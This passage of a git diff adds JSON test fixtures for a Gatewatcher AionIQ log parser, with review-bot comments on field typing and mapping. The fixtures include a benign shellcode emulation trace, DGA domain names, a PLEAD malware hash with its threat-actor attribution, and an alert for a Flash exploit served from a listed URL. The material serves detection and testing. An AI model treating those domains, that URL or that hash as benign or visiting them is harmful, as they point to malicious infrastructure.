+ "{\"_id\": -1, \"info\": \"Stop : End of shellcode (Exit)\"}",
+ "{\"_id\": 0, \"args\": \"{lpFileName: user32.dll}\", \"call\": \"kernel32_LoadLibraryA\", \"ret\": \"0x70600000\"}",
+ "{\"_id\": 1, \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\", \"call\": \"user32_MessageBoxA\", \"ret\": \"1\"}",
+ "{\"_id\": 2, \"args\": \"{uExitCode: 0}\", \"call\": \"kernel32_ExitProcess\", \"ret\": \"0\"}"
+ ],
+ "encodings": [
+ "{\"count\": 4, \"name\": \"Bloxor\"}"
+ ],
+ "id": "790a2aa742e1da23e14c9b7270ee81a1",
+ "sample_id": "09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr",
+ "sub_type": "Windows_x86_32"
+ },
+ "version": "1"
+ },
+ "network": {
+ "protocol": "unknown",
+ "transport": "tcp"
+ },
+ "observer": {
+ "hostname": "gcenter-clelyo-01.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": 
"gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "gcenter-clelyo-01.gatewatcher.com"
+ ],
+ "ip": [
+ "178.160.128.2",
+ "80.15.17.183"
+ ]
+ },
+ "source": {
+ "address": "80.15.17.183",
+ "ip": "80.15.17.183",
+ "port": 60078
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/dga_event.json b/GateWatcher/aioniq_ecs/tests/dga_event.json
new file mode 100644
index 000000000..fab96a746
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/dga_event.json
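Review bot: The expected `gatewatcher.shellcode.analysis` array lists the `_id: -1` stop marker before the three API calls, whereas the input has it last, so the fixture as written cannot tell a reader whether the parser preserves the emulation order (`kernel32_LoadLibraryA` → `user32_MessageBoxA` → `kernel32_ExitProcess`). If the test harness sorts arrays before comparing, that is fine but worth a comment in the fixture's sibling documentation; if the parser itself re-sorts, the call sequence — which is what an analyst reads to classify the shellcode — is lost. Either way `_id` would be a better sort key than the stringified JSON, and `call` alone would be a more useful field than the whole record as a string.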
@@ -0,0 +1,90 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"network\": {\n \"protocol\": \"dns\",\n \"transport\": \"udp\",\n \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n \"flow_id\": 1434780527372168\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"ip\": \"27.0.0.227\"\n },\n \"destination\": {\n \"port\": 53,\n \"ip\": \"202.129.215.23\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"dga\": {\n \"dga_count\": 35,\n \"dga_ratio\": 0.97,\n \"malware_behavior_confidence\": 50,\n \"nx_domain_count\": 36,\n \"top_DGA\": [\n \"zmhaoyukbol6a.com\",\n \"ppyblaohb.com\",\n \"khllpmpmare.com\",\n \"lttulzaiaoctpa7.com\",\n \"jetuergatod.com\",\n \"riaaiysk.com\",\n \"anxsmqyfy.com\",\n \"tqjhvylf.com\",\n \"vdunsygwoktx.com\",\n \"jhghrlufoh.com\"\n ]\n },\n \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n \"kind\": \"alert\",\n \"module\": \"dga_detect\",\n \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"dataset\": \"alert\",\n \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n }\n}" + }, + "expected": { + "message": "{\n \"network\": {\n \"protocol\": \"dns\",\n \"transport\": \"udp\",\n \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n \"flow_id\": 1434780527372168\n },\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": 
\"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"ip\": \"27.0.0.227\"\n },\n \"destination\": {\n \"port\": 53,\n \"ip\": \"202.129.215.23\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"dga\": {\n \"dga_count\": 35,\n \"dga_ratio\": 0.97,\n \"malware_behavior_confidence\": 50,\n \"nx_domain_count\": 36,\n \"top_DGA\": [\n \"zmhaoyukbol6a.com\",\n \"ppyblaohb.com\",\n \"khllpmpmare.com\",\n \"lttulzaiaoctpa7.com\",\n \"jetuergatod.com\",\n \"riaaiysk.com\",\n \"anxsmqyfy.com\",\n \"tqjhvylf.com\",\n \"vdunsygwoktx.com\",\n \"jhghrlufoh.com\"\n ]\n },\n \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n \"@version\": \"1\",\n \"event\": {\n \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n \"kind\": \"alert\",\n \"module\": \"dga_detect\",\n \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"dataset\": \"alert\",\n \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n }\n}", + "event": { + "category": [ + "intrusion_detection", + "network" + ], + "dataset": "alert", + "kind": "alert", + "module": "dga_detect", + "severity": 1 + }, + "@timestamp": "2024-09-11T09:16:33.314331Z", + "destination": { + "address": "202.129.215.23", + "ip": "202.129.215.23", + "port": 53 + }, + "gatewatcher": { + "dga": { + "dga_count": "35", + "dga_ratio": "0.97", + "malware_behavior_confidence": "50", + "nx_domain_count": "36", + "top_DGA": [ + "anxsmqyfy.com", + "jetuergatod.com", + "jhghrlufoh.com", + "khllpmpmare.com", + "lttulzaiaoctpa7.com", + "ppyblaohb.com", + "riaaiysk.com", + "tqjhvylf.com", + "vdunsygwoktx.com", + "zmhaoyukbol6a.com" + ] + }, + "event": { + "created": 
"2024-09-11T09:16:33.194964Z",
+ "id": "0ec85c0d-68b6-4602-b26e-d0966d5e1b9d"
+ },
+ "network": {
+ "flow_id": 1434780527372168,
+ "timestamp": "2024-09-11T09:15:25.886786Z"
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-clement-l.gatewatcher.fr",
+ "version": "2.5.4.0-rc1"
+ },
+ "log_format_version": "1.0.0",
+ "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+ },
+ "version": "1"
+ },
+ "network": {
+ "protocol": "dns",
+ "transport": "udp"
+ },
+ "observer": {
+ "hostname": "gcenter-clelyo-01.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "gcenter-clelyo-01.gatewatcher.com"
+ ],
+ "ip": [
+ "202.129.215.23",
+ "27.0.0.227"
+ ]
+ },
+ "source": {
+ "address": "27.0.0.227",
+ "ip": "27.0.0.227"
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/history.json b/GateWatcher/aioniq_ecs/tests/history.json
new file mode 100644
index 000000000..a043a3805
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/history.json
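Review bot: The numeric DGA indicators arrive as JSON numbers in the input but the expected output stores them as strings (`"dga_count": "35"`, `"dga_ratio": "0.97"`, `"malware_behavior_confidence": "50"`, `"nx_domain_count": "36"`), which rules out range conditions such as a ratio threshold in detection rules; history.json in this same patch does the opposite (`"code": "200"` in the input becomes `200`), so the typing policy looks inconsistent rather than deliberate. The beacon_detect fixture earlier in the patch has the same stringification for `beacon.active`, `mean_time_interval` and `session_count`. Declaring these as integer/float/boolean in `_meta/fields.yml` (outside this hunk) and updating the expectations would fix all three. Separately, the ten `top_DGA` domains are the most useful pivot of this alert, yet `related.hosts` only carries the observer hostname; adding them to `related.hosts` would let the domains correlate with DNS logs from other intakes.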
@@ -0,0 +1,52 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Gatewatcher AionIQ V103",
+ "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+ }
+ },
+ "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"event\",\n \"dataset\": \"administration\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"history\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"history\": {\n \"type\": \"user\",\n \"name\": \"pierre.pocry\",\n \"id\": 18,\n \"ip\": \"192.192.32.12\",\n \"content\": {},\n \"method\": \"POST\",\n \"endpoint\": \"/gum/configuration\",\n \"code\": \"200\"\n },\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}"
+ },
+ "expected": {
+ "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"event\",\n \"dataset\": \"administration\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"history\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"history\": {\n \"type\": \"user\",\n \"name\": \"pierre.pocry\",\n \"id\": 18,\n \"ip\": \"192.192.32.12\",\n \"content\": {},\n \"method\": \"POST\",\n \"endpoint\": \"/gum/configuration\",\n \"code\": \"200\"\n },\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}",
+ "event": {
+ "category": [
+ "host"
+ ],
+ "dataset": "administration",
+ "kind": "event",
+ "module": "history"
+ },
+ "@timestamp": "2022-09-01T16:06:51.664000Z",
+ "gatewatcher": {
+ "event": {
+ "id": "8223b432-7e97-4570-a29d-254f41dbb9db"
+ },
+ "history": {
+ "code": 200,
+ "content": "{}",
+ "endpoint": "/gum/configuration",
+ "id": 18,
+ 
"ip": "192.192.32.12",
+ "method": "POST",
+ "name": "pierre.pocry",
+ "type": "user"
+ },
+ "observer": {
+ "log_format_version": "1.0.0"
+ }
+ },
+ "observer": {
+ "hostname": "gcenter-interne-rd-56.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "gcenter-interne-rd-56.gatewatcher.com"
+ ]
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/ioc.json b/GateWatcher/aioniq_ecs/tests/ioc.json
new file mode 100644
index 000000000..190c98114
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/ioc.json
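Review bot: This administration audit event keeps the client address of the `POST /gum/configuration` call only as `gatewatcher.history.ip` and never sets `source.ip` or `related.ip`, so it is the one fixture in this patch whose IP cannot be correlated with the others through `related.ip`, which is exactly the pivot an investigator wants for a configuration change. The operator `pierre.pocry` is likewise not surfaced as `user.name` / `related.user`, and `method` and `endpoint` map naturally to `http.request.method` and `url.path`. Whether to add these is a parser decision in `ingest/parser.yml`, outside this hunk, but the expectation here should change with it.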
@@ -0,0 +1,96 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"observer\": {\n \"product\": \"lastinfosec\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"enrichment\",\n \"dataset\": \"ioc\",\n \"category\": [\n \"network\",\n \"threat\"\n ],\n \"module\": \"ioc\",\n \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"created\": \"2019-10-23T05:33:54+00:00\",\n \"severity\": 2,\n \"severity_human\": \"High suspicious\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ioc\": {\n \"tlp\": \"green\",\n \"type\": \"SHA256\",\n \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n \"relations\": [\n \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n \"b57f419e-8b12-49d3-886b-145383725dcd\"\n ],\n \"ttp\": [],\n \"families\": [\n \"PLEAD\"\n ],\n \"campaigns\": [],\n \"categories\": [\n \"malware\",\n \"trojan\"\n ],\n \"threat_actor\": [\n \"BlackTech\"\n ],\n \"targeted_sectors\": [],\n \"targeted_organizations\": [],\n \"targeted_platforms\": [],\n \"targeted_countries\": [],\n \"vulnerabilities\": [],\n \"kill_chain_phases\": [],\n \"meta_data\": {\n \"cwe\": [],\n \"descriptions\": [],\n \"usageMode\": \"detection\"\n },\n \"usage_mode\": \"detection\",\n \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n \"tags\": [\n 
\"troj_fr.df33c1bd\",\n \"trojan.plead.win32.33\",\n \"gen:variant.graftor.598952 (b)\",\n \"generic backdoor.gy\",\n \"win32/plead.au trojan\",\n \"trojan/plead!exyhr4fe\",\n \"trojan.win32.plead.fqunov\",\n \"tr/plead.mysge\",\n \"trojan.win32.plead\",\n \"trojan ( 0055a46c1 )\",\n \"malware\",\n \"trojan.win32.plead.aa\",\n \"trojan/win32.plead\"\n ],\n \"external_links\": [\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n },\n {\n \"source_name\": \"any.run_report\",\n \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n }\n ]\n }\n}" + }, + "expected": { + "message": "{\n \"observer\": {\n \"product\": \"lastinfosec\",\n \"vendor\": \"gatewatcher\",\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"enrichment\",\n \"dataset\": \"ioc\",\n \"category\": [\n \"network\",\n \"threat\"\n ],\n \"module\": \"ioc\",\n \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"created\": \"2019-10-23T05:33:54+00:00\",\n \"severity\": 2,\n \"severity_human\": \"High suspicious\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ioc\": {\n \"tlp\": \"green\",\n \"type\": \"SHA256\",\n \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High 
suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n \"relations\": [\n \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n \"b57f419e-8b12-49d3-886b-145383725dcd\"\n ],\n \"ttp\": [],\n \"families\": [\n \"PLEAD\"\n ],\n \"campaigns\": [],\n \"categories\": [\n \"malware\",\n \"trojan\"\n ],\n \"threat_actor\": [\n \"BlackTech\"\n ],\n \"targeted_sectors\": [],\n \"targeted_organizations\": [],\n \"targeted_platforms\": [],\n \"targeted_countries\": [],\n \"vulnerabilities\": [],\n \"kill_chain_phases\": [],\n \"meta_data\": {\n \"cwe\": [],\n \"descriptions\": [],\n \"usageMode\": \"detection\"\n },\n \"usage_mode\": \"detection\",\n \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n \"tags\": [\n \"troj_fr.df33c1bd\",\n \"trojan.plead.win32.33\",\n \"gen:variant.graftor.598952 (b)\",\n \"generic backdoor.gy\",\n \"win32/plead.au trojan\",\n \"trojan/plead!exyhr4fe\",\n \"trojan.win32.plead.fqunov\",\n \"tr/plead.mysge\",\n \"trojan.win32.plead\",\n \"trojan ( 0055a46c1 )\",\n \"malware\",\n \"trojan.win32.plead.aa\",\n \"trojan/win32.plead\"\n ],\n \"external_links\": [\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n },\n {\n \"source_name\": \"Twitter\",\n \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n },\n {\n \"source_name\": 
\"any.run_report\",\n \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n }\n ]\n }\n}", + "event": { + "category": [ + "network", + "threat" + ], + "dataset": "ioc", + "kind": "enrichment", + "module": "ioc", + "severity": 2 + }, + "gatewatcher": { + "event": { + "created": "2019-10-23T05:33:54Z", + "id": "3713d994-1db4-40ff-abe9-2f43bac7b5fa" + }, + "ioc": { + "campaigns": [], + "case_id": "21615052-7cf3-48cd-9aff-36a61e45528c", + "categories": [ + "malware", + "trojan" + ], + "creation_date": "2019-10-23T05:33:54Z", + "description": "2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\nWe advised to use this IoC in detection mode.", + "external_links": [ + "{\"source_name\": \"Twitter\", \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"}", + "{\"source_name\": \"Twitter\", \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"}", + "{\"source_name\": \"Twitter\", \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"}", + "{\"source_name\": \"Twitter\", \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"}", + "{\"source_name\": \"any.run_report\", \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"}" + ], + "families": [ + "PLEAD" + ], + "kill_chain_phases": [], + "meta_data": { + "cwe": [], + "descriptions": [], + "usageMode": "detection" + }, + "package_date": "2023-04-07T05:00:02.362356Z", + "relations": [ + "6fe8a2a1-a1b0-4af8-953d-4babd329f8f8", + "b57f419e-8b12-49d3-886b-145383725dcd" + ], + "signature": "SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa", + "tags": 
[
+ "gen:variant.graftor.598952 (b)",
+ "generic backdoor.gy",
+ "malware",
+ "tr/plead.mysge",
+ "troj_fr.df33c1bd",
+ "trojan ( 0055a46c1 )",
+ "trojan.plead.win32.33",
+ "trojan.win32.plead",
+ "trojan.win32.plead.aa",
+ "trojan.win32.plead.fqunov",
+ "trojan/plead!exyhr4fe",
+ "trojan/win32.plead",
+ "win32/plead.au trojan"
+ ],
+ "targeted_countries": [],
+ "targeted_organizations": [],
+ "targeted_platforms": [],
+ "targeted_sectors": [],
+ "threat_actor": [
+ "BlackTech"
+ ],
+ "tlp": "green",
+ "type": "SHA256",
+ "updated_date": "2023-04-07T04:10:34Z",
+ "usage_mode": "detection",
+ "value": "2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4"
+ },
+ "observer": {
+ "log_format_version": "1.0.0"
+ }
+ },
+ "observer": {
+ "product": "lastinfosec",
+ "vendor": "gatewatcher"
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/malcore_event.json b/GateWatcher/aioniq_ecs/tests/malcore_event.json
new file mode 100644
index 000000000..068b58407
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/malcore_event.json
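Review bot: The indicator itself — `ioc.type: "SHA256"` with `ioc.value: "2e789fc5…"` — is kept only under the vendor namespace; nothing lands in `related.hash` or in the ECS `threat.indicator.*` fields (`threat.indicator.type`, `threat.indicator.file.hash.sha256`, `threat.indicator.marking.tlp`), so this `event.kind: enrichment` record cannot be matched against file hashes observed by other intakes. The `tlp`, `families` and `threat_actor` values stay unmapped as well, which is a loss because those fields are what lets a platform rank an IoC hit. The `threat.indicator` mapping would be added in `ingest/parser.yml`, outside this hunk, with this expectation updated alongside it.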
@@ -0,0 +1,154 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"202.129.215.251\"\n },\n \"file\": {\n \"magic\": \"Macromedia Flash data (compressed), version 13\",\n \"sid\": [\n 1100020\n ],\n \"hash\": {\n \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n },\n \"name\": \"/\",\n \"file_id\": 219,\n \"tx_id\": 2,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 55351,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n \"malcore\": {\n \"file_type\": \"application/x-shockwave-flash\",\n \"analyzers_up\": 16,\n \"analyzed_clean\": 9,\n \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n \"state\": \"Infected\",\n \"total_found\": \"3/16\",\n \"detail_scan_time\": 373,\n \"reporting_token\": \"\",\n \"analyzed_infected\": 3,\n \"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n \"analyzed_suspicious\": 0,\n \"analyzed_error\": 0,\n \"processing_time\": 1576,\n \"engine_id\": {\n \"5\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c18ab9n\"\n },\n \"8\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"Exploit.Flash\",\n \"id\": \"ib54e9s\"\n },\n \"4\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"c10195e\"\n },\n \"14\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": 
\"t3114fn\"\n },\n \"13\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"sde882s\"\n },\n \"9\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"kfb8487\"\n },\n \"12\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"qb9308l\"\n },\n \"10\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"mb2b5fe\"\n },\n \"0\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"a32935b\"\n },\n \"15\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"we9a17t\"\n },\n \"6\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c81e55c\"\n },\n \"7\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"\",\n \"id\": \"e83bf1t\"\n },\n \"3\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"b557a5r\"\n },\n \"1\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"EXP/Flash.EB.502\",\n \"id\": \"acf9bba\"\n },\n \"11\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"Unavailable (permanently_failed)\",\n \"id\": \"n00000e\"\n },\n \"2\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"SWF/Exploit\",\n \"id\": \"af7872b\"\n }\n },\n \"detail_wait_time\": 660,\n \"file_type_description\": \"Macromedia Flash Player\",\n \"code\": 1,\n \"magic_details\": \"Macromedia Flash data (compressed), version 13\",\n \"analyzed_other\": 4\n },\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1779492455056060\n },\n \"destination\": {\n \"port\": 47858,\n \"ip\": \"27.0.0.144\"\n },\n \"url\": {\n \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n },\n \"user_agent\": {\n \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n },\n 
\"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"version\": \"HTTP/1.1\",\n \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/x-shockwave-flash\",\n \"bytes\": 55351\n }\n },\n \"event\": {\n \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n \"kind\": \"alert\",\n \"module\": \"malcore\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T09:15:23.329615+0000\",\n \"dataset\": \"alert\"\n }\n}" + }, + "expected": { + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"202.129.215.251\"\n },\n \"file\": {\n \"magic\": \"Macromedia Flash data (compressed), version 13\",\n \"sid\": [\n 1100020\n ],\n \"hash\": {\n \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n },\n \"name\": \"/\",\n \"file_id\": 219,\n \"tx_id\": 2,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 55351,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n \"malcore\": {\n \"file_type\": 